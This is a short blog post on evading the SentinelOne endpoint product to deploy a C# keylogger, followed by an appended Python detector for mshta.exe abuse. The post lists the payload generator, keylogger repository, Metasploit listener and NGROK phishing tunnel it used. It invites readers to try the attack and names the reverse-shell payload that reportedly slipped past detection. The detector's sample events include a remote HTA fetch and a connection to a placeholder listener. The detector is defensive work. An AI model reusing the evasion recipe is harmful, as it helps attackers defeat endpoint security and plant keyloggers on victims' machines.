
Bypass SentinelOne with Metasploit and Deploy C# Keylogger

  • emmanuellws
  • Apr 24, 2018
  • 1 min read

Before I ran the Annabelle ransomware test on my test machine protected by SentinelOne, I found my way around SentinelOne and was able to bypass it and deploy a keylogger using Metasploit and a C# keylogger.

Here is the full video.

These are the tools I used to generate the payload and get it past SentinelOne:

1) https://github.com/r00t-3xp10it/venom (use HTA payloads only)

2) https://github.com/cristian-henrique/csharp-keylogger

3) Metasploit - fire up a listener and wait for the HTA to be executed

4) NGROK tunneling (for phishing address demo purposes)

SentinelOne is one of the most advanced next-generation AV products I have ever come across; it relies solely on behavioral detection and protection. Because of this, it should only be considered ONE layer of behavioral protection. I like it for being light and powerful, but I still think that signatures, a firewall and big-data application whitelisting are still required. I like their Rollback feature, but there is always room for error in a "Rollback" feature.

Well, I could bypass Panda Adaptive Defense too, but their whitelisting made it hard for me to deploy a keylogger such as the one in this video.

In case you want to try it yourself, please set the payload to "windows/shell/reverse_tcp". The other payloads have already been discovered and are blocked by SentinelOne; this was the only one that got through. SentinelOne is very successful at detecting and blocking exploit payloads generated through Empire, Veil and Metasploit.
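As an added example (not code from the original post or from any of the tools listed above), here is the defender-side view of the chain this post relies on: mshta.exe executing an HTA fetched from a remote address, mshta.exe opening an outbound connection to the listener, and mshta.exe spawning a cmd.exe shell, which is what a windows/shell payload produces. The Sysmon-style field names and the sample events are constructed for this example and are assumptions, not real telemetry.

```python
# Added example: flag the HTA -> shell execution chain described in the post
# using constructed Sysmon-style events (EventID 1 = process create,
# EventID 3 = network connection). Field names are assumptions.

# Processes an HTA host should not be spawning in normal use (assumption).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"}


def image_name(path: str) -> str:
    """Return the lowercase file name of an image path (handles / and \\)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_hta_chain(events):
    """Return a list of (rule, detail) alerts for mshta.exe abuse patterns."""
    alerts = []
    for ev in events:
        img = image_name(ev.get("Image", ""))
        cmd = ev.get("CommandLine", "")
        if ev["EventID"] == 1:
            parent = image_name(ev.get("ParentImage", ""))
            # Rule 1: mshta.exe spawning a shell or LOLBin (the shell stage).
            if parent == "mshta.exe" and img in SUSPICIOUS_CHILDREN:
                alerts.append(("mshta_spawns_shell", f"{parent} -> {img}: {cmd}"))
            # Rule 2: mshta.exe launched with a URL instead of a local .hta file.
            if img == "mshta.exe" and "http" in cmd.lower():
                alerts.append(("mshta_remote_url", cmd))
        elif ev["EventID"] == 3 and img == "mshta.exe":
            # Rule 3: the HTA host itself opening an outbound connection.
            dest = f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"
            alerts.append(("mshta_network", f"mshta.exe -> {dest}"))
    return alerts


# Constructed sample events: one benign local HTA, then a phishing-style chain.
# The URL, IP and port are placeholders (documentation ranges), not real ones.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"mshta.exe C:\Tools\inventory.hta"},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "mshta.exe http://example.invalid/update.hta"},
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 4444},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for rule, detail in detect_hta_chain(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The benign local HTA in the first event produces no alert; the remaining three events each trip one rule, which is the kind of correlation a behavioral-only product has to rely on when the payload itself carries no signature.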
